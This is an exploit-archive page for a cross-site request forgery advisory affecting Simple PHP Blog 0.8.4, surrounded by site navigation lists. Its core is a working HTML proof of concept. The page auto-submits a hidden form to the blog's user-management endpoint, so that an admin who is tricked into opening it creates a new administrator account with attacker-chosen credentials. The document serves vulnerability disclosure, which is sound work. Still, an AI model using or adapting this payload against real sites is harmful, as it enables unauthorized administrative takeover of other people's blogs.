Simple PHP Blog 0.8.4 Cross Site Request Forgery

Simple PHP Blog 0.8.4 Cross Site Request Forgery: Posted Oct 7, 2016; Authored by Besim; Simple PHP Blog version 0.8.4 suffers from a cross site request forgery vulnerability.; tags | exploit, php, csrf; SHA-256 | 7a769fb47130421f1c88cc48e0b0c98706ea619e034c03509dd7467b5d2c2205; Download | Favorite | View

Simple PHP Blog 0.8.4 Cross Site Request Forgery

<!--
 
=========================================================================================================
Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add Admin)
=========================================================================================================
 
# Exploit Title: Simple PHP Blog 0.8.4 - Cross-Site Request Forgery (Add
Admin)
# Author: Besim
# Google Dork: -
# Date: 07/10/2016
# Type: webapps
# Platform : PHP
# Vendor Homepage: http://simpleblogphp.com/
# Software Link: https://sourceforge.net/projects/sphpblog/
# Version: 0.8.4
# Tested on: Ubuntu 14.04.5
 
Simple PHP Blog 0.8.4 versions is vulnerable to CSRF attack (No CSRF token
in place)
meaning that if an admin user can be tricked to visit a crafted URL created
by
attacker (via spear phishing/social engineering), a form will be submitted
to (*http://localhost/simple/manage_users.php?action=update&type=new
<http://localhost/simple/manage_users.php?action=update&type=new>*) that
will add a new user as administrator.
 
Once exploited, the attacker can login to the admin panel
(*http://localhost/simple/login.php <http://localhost/simple/login.php>*)
using the username and the password he posted in the form.
 
*CSRF PoC Code*
=============
 
-->
 
<html>
  <body>
    <form action="
http://localhost/simple/manage_users.php?action=update&type=new"
method="POST">
      <input type="hidden" name="sUsername" value="Besim" />
      <input type="hidden" name="sFullname" value="Besim" />
      <input type="hidden" name="sPassword" value="mehmet" />
      <input type="hidden" name="sEmail" value="mehmet@yopmail.com"
/>
      <input type="hidden" name="sAvatar" value="" />
      <input type="hidden" name="sActive" value="on" />
      <input type="hidden" name="sModComments" value="on" />
      <input type="hidden" name="sDeleteEntries" value="on" />
      <input type="hidden" name="sEditAny" value="on" />
      <input type="hidden" name="submit" value="Create User" />
      <input type="submit" value="Submit request" />
    </form>
    <script>
      document.forms[0].submit();
    </script>
  </body>
</html>
 
 
 
 
-- 
 
Besim ALTiNOK

Top Authors In Last 30 Days

Red Hat 237 files
indoushka 172 files
Jay Turla 150 files
Ubuntu 78 files
h00die 54 files
juan vazquez 43 files
sinn3r 41 files
H D Moore 31 files
Karn Ganeshen 23 files
Pedro Ribeiro 22 files

File Archives

Systems

AIX (430)
Apple (2,114)
BSD (378)
CentOS (61)
Cisco (1,954)
Debian (7,124)
Fedora (1,693)
FreeBSD (1,247)
Gentoo (4,567)
HPUX (881)
iOS (389)
iPhone (108)
IRIX (220)
Juniper (71)
Linux (51,237)
Mac OS X (696)
Mandriva (3,105)
NetBSD (256)
OpenBSD (490)
RedHat (16,845)
Slackware (941)
Solaris (1,615)
SUSE (1,444)
Ubuntu (9,852)
UNIX (9,456)
UnixWare (188)
Windows (6,772)
Other

Simple PHP Blog 0.8.4 Cross Site Request Forgery

Simple PHP Blog 0.8.4 Cross Site Request Forgery

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems

Simple PHP Blog 0.8.4 Cross Site Request Forgery

Share This

Simple PHP Blog 0.8.4 Cross Site Request Forgery

File Archive:

September 2024

Top Authors In Last 30 Days

File Tags

File Archives

Systems